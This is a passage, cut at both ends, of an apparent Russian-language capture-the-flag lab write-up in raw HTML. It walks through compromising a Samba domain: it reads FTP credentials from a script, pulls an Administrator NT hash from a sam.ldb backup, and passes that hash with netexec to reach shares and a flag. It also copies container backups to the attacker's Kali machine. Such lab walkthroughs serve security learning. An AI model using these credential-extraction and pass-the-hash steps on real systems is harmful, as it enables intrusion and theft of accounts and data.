srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/90b\/693\/c32\/90b693c321afc8ea6917293d9b84d8e0.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/90b\/693\/c32\/90b693c321afc8ea6917293d9b84d8e0.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0412 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u043f\u0430\u043f\u043a\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u0430\u043f\u043a\u0443 <strong>scripts<\/strong>.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e41\/d38\/497\/e41d3849724341fd4b3356e00f8e040f.png\" width=\"494\" height=\"228\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e41\/d38\/497\/e41d3849724341fd4b3356e00f8e040f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e41\/d38\/497\/e41d3849724341fd4b3356e00f8e040f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0444\u0430\u0439\u043b <a href=\"https:\/\/ttp:\/\/server.py\" rel=\"noopener noreferrer nofollow\"><strong>server.py<\/strong><\/a>.<\/p>\n<p><strong>cat <\/strong><a href=\"http:\/\/server.py\" rel=\"noopener noreferrer nofollow\"><strong>server.py<\/strong><\/a><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9a4\/384\/5d2\/9a43845d22535a25cd60f955d65b227f.png\" width=\"684\" height=\"236\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9a4\/384\/5d2\/9a43845d22535a25cd60f955d65b227f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9a4\/384\/5d2\/9a43845d22535a25cd60f955d65b227f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043b\u043e\u0433\u0438\u043d \u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u0434\u043b\u044f <strong>ftp<\/strong> \u0441\u0435\u0440\u0432\u0435\u0440\u0430.<\/p>\n<p>\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u043a <strong>ftp <\/strong>\u0441\u0435\u0440\u0432\u0435\u0440\u0443.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e3d\/acf\/14b\/e3dacf14be14d38e243d4378efc41584.png\" alt=\" \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0431\u044d\u043a\u0430\u043f\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430.\" title=\" \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0431\u044d\u043a\u0430\u043f\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430.\" width=\"826\" height=\"230\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e3d\/acf\/14b\/e3dacf14be14d38e243d4378efc41584.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e3d\/acf\/14b\/e3dacf14be14d38e243d4378efc41584.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption> \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0431\u044d\u043a\u0430\u043f\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430.<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u0441 \u0431\u044d\u043a\u0430\u043f\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d2a\/e6f\/608\/d2ae6f608a7bd9b58c797c603249fe67.png\" width=\"826\" height=\"230\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d2a\/e6f\/608\/d2ae6f608a7bd9b58c797c603249fe67.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d2a\/e6f\/608\/d2ae6f608a7bd9b58c797c603249fe67.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> \u0418 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f \u0441\u0430\u043c\u0431\u044b.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f63\/bf6\/034\/f63bf60341bef6cfb87afd81eae29513.png\" width=\"1097\" height=\"120\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f63\/bf6\/034\/f63bf60341bef6cfb87afd81eae29513.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f63\/bf6\/034\/f63bf60341bef6cfb87afd81eae29513.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.<\/p>\n<p><strong>tar -xvjf <\/strong><a href=\"http:\/\/samba-backup-2024-02-17T20-32-13.580437.tar.bz\" rel=\"noopener noreferrer nofollow\"><strong>samba-backup-2024-02-17T20-32-13.580437.tar.bz<\/strong><\/a><strong>2<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/42e\/2bb\/6ec\/42e2bb6ec74ee8c7b1cde34b8ebc61c5.png\" width=\"1088\" height=\"531\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/42e\/2bb\/6ec\/42e2bb6ec74ee8c7b1cde34b8ebc61c5.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/42e\/2bb\/6ec\/42e2bb6ec74ee8c7b1cde34b8ebc61c5.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043c \u043d\u0443\u0436\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0441\u0430\u043c\u0431\u043e\u0439.<\/p>\n<p><strong>sudo apt install ldb-tools -y<\/strong><\/p>\n<p><strong>sudo apt install samba-dsdb-modules -y<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fd2\/11e\/84b\/fd211e84b3efb213a3731b6d63d6e776.png\" width=\"561\" height=\"196\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/fd2\/11e\/84b\/fd211e84b3efb213a3731b6d63d6e776.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fd2\/11e\/84b\/fd211e84b3efb213a3731b6d63d6e776.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0418\u0449\u0435\u043c \u0445\u0435\u0448 \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>ldbsearch -H private\/sam.ldb &#8216;(objectClass=user)&#8217; sAMAccountName &#8216;unicodepwd&#8217;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/050\/a7a\/e31\/050a7ae31bc248e6ebe4c44bab8ad672.png\" width=\"1106\" height=\"632\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/050\/a7a\/e31\/050a7ae31bc248e6ebe4c44bab8ad672.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/050\/a7a\/e31\/050a7ae31bc248e6ebe4c44bab8ad672.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u0445\u0435\u0448 \u0435\u0449\u0451 \u043d\u0443\u0436\u043d\u043e \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u0442\u044c.<\/p>\n<p><a href=\"https:\/\/samba.tranquil.it\/doc\/en\/samba_fundamentals-about_password_hash.html\" rel=\"noopener noreferrer nofollow\">https:\/\/samba.tranquil.it\/doc\/en\/samba_fundamentals-about_password_hash.html<\/a><\/p>\n<p><strong>python3 -c &#171;import codecs, binascii; print(binascii.hexlify(codecs.decode(b&#8217;Nv4kHqDqpTPV+si9f7b4ow==&#8217;, &#8216;base64&#8217;)).decode())&#187;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/891\/71c\/da2\/89171cda2cd17e790aa94c57421aab95.png\" width=\"1043\" height=\"35\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/891\/71c\/da2\/89171cda2cd17e790aa94c57421aab95.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/891\/71c\/da2\/89171cda2cd17e790aa94c57421aab95.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0445\u0435\u0448 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d\u0435.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u Administrator -H 36fe241ea0eaa533d5fac8bd7fb6f8a3<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f71\/048\/bd2\/f71048bd2f6fcde5959786a0a22b7789.png\" width=\"1099\" height=\"83\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f71\/048\/bd2\/f71048bd2f6fcde5959786a0a22b7789.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f71\/048\/bd2\/f71048bd2f6fcde5959786a0a22b7789.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0423\u0447\u0451\u0442\u043a\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0442\u0435\u043f\u0435\u0440\u044c \u0448\u0430\u0440\u044b \u043a \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043d\u0435 \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u Administrator -H 36fe241ea0eaa533d5fac8bd7fb6f8a3 &#8212;shares<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ca\/0a6\/bf1\/4ca0a6bf1f8717554ac7018d393d1b86.png\" width=\"1102\" height=\"215\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4ca\/0a6\/bf1\/4ca0a6bf1f8717554ac7018d393d1b86.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ca\/0a6\/bf1\/4ca0a6bf1f8717554ac7018d393d1b86.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u0448\u0430\u0440\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0430 \u0437\u0430\u043f\u0438\u0441\u044c \u0438 \u0447\u0442\u0435\u043d\u0438\u0435, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043a \u043d\u0435\u0439 \u0438 \u0437\u0430\u0431\u0435\u0440\u0435\u043c \u0444\u043b\u0430\u0433.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u Administrator -H 36fe241ea0eaa533d5fac8bd7fb6f8a3 &#8212;spider home &#8212;pattern txt<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/aee\/247\/f06\/aee247f06f6a8eba03b690336202b46f.png\" width=\"1098\" height=\"135\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/aee\/247\/f06\/aee247f06f6a8eba03b690336202b46f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/aee\/247\/f06\/aee247f06f6a8eba03b690336202b46f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0442\u0440\u0435\u0442\u0438\u0439 \u0444\u043b\u0430\u0433.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d40\/ea1\/67b\/d40ea167bef519879fb540093d5e3dfa.png\" width=\"360\" height=\"82\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d40\/ea1\/67b\/d40ea167bef519879fb540093d5e3dfa.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d40\/ea1\/67b\/d40ea167bef519879fb540093d5e3dfa.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041c\u044b \u0441\u043e\u0431\u0440\u0430\u043b\u0438 \u0442\u0440\u0438 \u0444\u043b\u0430\u0433\u0430, \u043e\u0441\u0442\u0430\u043b\u0441\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044b\u0439, \u0432\u0435\u0440\u043d\u0435\u043c\u0441\u044f \u043d\u0430 <strong>backup<\/strong> \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u0432 \u0434\u043e\u043a\u0435\u0440.<\/p>\n<p><strong>docker exec -it scripts_ftp_1 bash<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/989\/8c4\/b1c\/9898c4b1cb8ee7843241c49ba057309e.png\" width=\"534\" height=\"136\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/989\/8c4\/b1c\/9898c4b1cb8ee7843241c49ba057309e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/989\/8c4\/b1c\/9898c4b1cb8ee7843241c49ba057309e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 <strong>volumes<\/strong>.<\/p>\n<p><strong>cd volumes<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4c1\/dda\/19b\/4c1dda19b380d4f106c66de6f15deb4a.png\" width=\"518\" height=\"135\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4c1\/dda\/19b\/4c1dda19b380d4f106c66de6f15deb4a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4c1\/dda\/19b\/4c1dda19b380d4f106c66de6f15deb4a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438 \u0444\u0430\u0439\u043b\u044b \u0432 \u043f\u0430\u043f\u043a\u0443 <strong>docker_src<\/strong>.<\/p>\n<p><strong>ls docker_src\/<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/51d\/035\/2ac\/51d0352acc42f27a44c8ff00ed8a2dc4.png\" width=\"893\" height=\"95\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/51d\/035\/2ac\/51d0352acc42f27a44c8ff00ed8a2dc4.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/51d\/035\/2ac\/51d0352acc42f27a44c8ff00ed8a2dc4.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0417\u0434\u0435\u0441\u044c \u043b\u0435\u0436\u0430\u0442 \u0431\u044d\u043a\u0430\u043f\u044b, \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0438\u0445 \u0438 \u0437\u0430\u0431\u0440\u0430\u0442\u044c \u0441\u0435\u0431\u0435 \u043d\u0430 <strong>kali<\/strong>, \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u043f\u0430\u043a\u0443\u0435\u043c \u0444\u0430\u0439\u043b\u044b.<\/p>\n<p><strong>tar -zcf docker_src.tar.gz docker_src\/<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/784\/8fa\/e2c\/7848fae2cbcb712d94a7fd0b8bdb2ff9.png\" width=\"521\" height=\"140\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/784\/8fa\/e2c\/7848fae2cbcb712d94a7fd0b8bdb2ff9.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/784\/8fa\/e2c\/7848fae2cbcb712d94a7fd0b8bdb2ff9.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0412\u044b\u0439\u0434\u0435\u043c \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0438 \u0441\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0444\u0430\u0439\u043b\u044b \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043d\u0430 \u0431\u044d\u043a\u0430\u043f \u0441\u0435\u0440\u0432\u0435\u0440.<\/p>\n<p> <strong>exit<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e2e\/007\/bfd\/e2e007bfd000da30d04e7bc157eb7559.png\" width=\"697\" height=\"76\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e2e\/007\/bfd\/e2e007bfd000da30d04e7bc157eb7559.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e2e\/007\/bfd\/e2e007bfd000da30d04e7bc157eb7559.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0435\u0440\u0435\u043d\u0435\u0441\u0435\u043c \u0444\u0430\u0439\u043b \u0432 \u043f\u0430\u043f\u043a\u0443<strong> \/tmp<\/strong>.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ef3\/d0c\/ef2\/ef3d0cef246a35fe110f4829d9e16aec.png\" width=\"452\" height=\"39\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/ef3\/d0c\/ef2\/ef3d0cef246a35fe110f4829d9e16aec.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ef3\/d0c\/ef2\/ef3d0cef246a35fe110f4829d9e16aec.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0444\u0430\u0439\u043b \u0441\u0435\u0431\u0435 \u043d\u0430 <strong>kali<\/strong>  \u0438 \u0440\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u043c.<\/p>\n<p><strong>scp abbie@unintended.vl@backup.unintended.vl:\/tmp\/docker_src.tar.gz .<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3d6\/78a\/6e9\/3d678a6e925635eac147432fe55416be.png\" width=\"1106\" height=\"79\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/3d6\/78a\/6e9\/3d678a6e925635eac147432fe55416be.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3d6\/78a\/6e9\/3d678a6e925635eac147432fe55416be.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p><strong>sudo tar -zxvf docker_src.tar.gz<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0b5\/ae2\/ba8\/0b5ae2ba87e07d5dfac92c9943cc1172.png\" width=\"541\" height=\"159\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/0b5\/ae2\/ba8\/0b5ae2ba87e07d5dfac92c9943cc1172.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0b5\/ae2\/ba8\/0b5ae2ba87e07d5dfac92c9943cc1172.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> \u0417\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0442\u0440\u0438 \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 <strong>duplicati<\/strong>.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/15c\/120\/ca7\/15c120ca7b167efacd8698799834a936.png\" width=\"1105\" height=\"662\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/15c\/120\/ca7\/15c120ca7b167efacd8698799834a936.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/15c\/120\/ca7\/15c120ca7b167efacd8698799834a936.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043e\u0437\u0434\u0430\u0435\u043c \u043f\u0430\u043f\u043a\u0443 <strong>restore<\/strong>, \u0442\u0430\u043c \u0431\u0443\u0434\u0443\u0442 \u043b\u0435\u0436\u0430\u0442\u044c \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435.<\/p>\n<p><strong>mkdir restore<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f19\/3ed\/41b\/f193ed41b2cda1646f0071ab9457110f.png\" width=\"155\" height=\"75\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f19\/3ed\/41b\/f193ed41b2cda1646f0071ab9457110f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f19\/3ed\/41b\/f193ed41b2cda1646f0071ab9457110f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0441\u043a\u0440\u0438\u043f\u0442 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0432 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 <strong>docker_src.<\/strong><\/p>\n<p><strong>sudo chown kali:kali docker_src<\/strong><\/p>\n<p><strong>sudo chmod 777 docker_src<\/strong><\/p>\n<p><strong>python3 restore_from_<\/strong><a href=\"http:\/\/python.py\" rel=\"noopener noreferrer nofollow\"><strong>python.py<\/strong><\/a><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/080\/9f3\/af5\/0809f3af52e5dd80722bf30d56bd132f.png\" width=\"942\" height=\"84\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/080\/9f3\/af5\/0809f3af52e5dd80722bf30d56bd132f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/080\/9f3\/af5\/0809f3af52e5dd80722bf30d56bd132f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0411\u0443\u0434\u0435\u0442 \u043c\u043d\u043e\u0433\u043e \u043e\u0448\u0438\u0431\u043e\u043a \u0438 \u044d\u0442\u043e \u0437\u0430\u0439\u043c\u0435\u0442 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2de\/4b6\/9b1\/2de4b69b14815c37152c9293b249b951.png\" width=\"1102\" height=\"669\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/2de\/4b6\/9b1\/2de4b69b14815c37152c9293b249b951.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2de\/4b6\/9b1\/2de4b69b14815c37152c9293b249b951.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/256\/547\/b54\/256547b548f81c1004a0a73d93349a8b.png\" width=\"234\" height=\"71\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/256\/547\/b54\/256547b548f81c1004a0a73d93349a8b.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/256\/547\/b54\/256547b548f81c1004a0a73d93349a8b.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043f\u0430\u043f\u043a\u0438, \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u0442\u0430\u043a.<\/p>\n<p><strong>ls restore\/source\/root\/scripts\/<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" 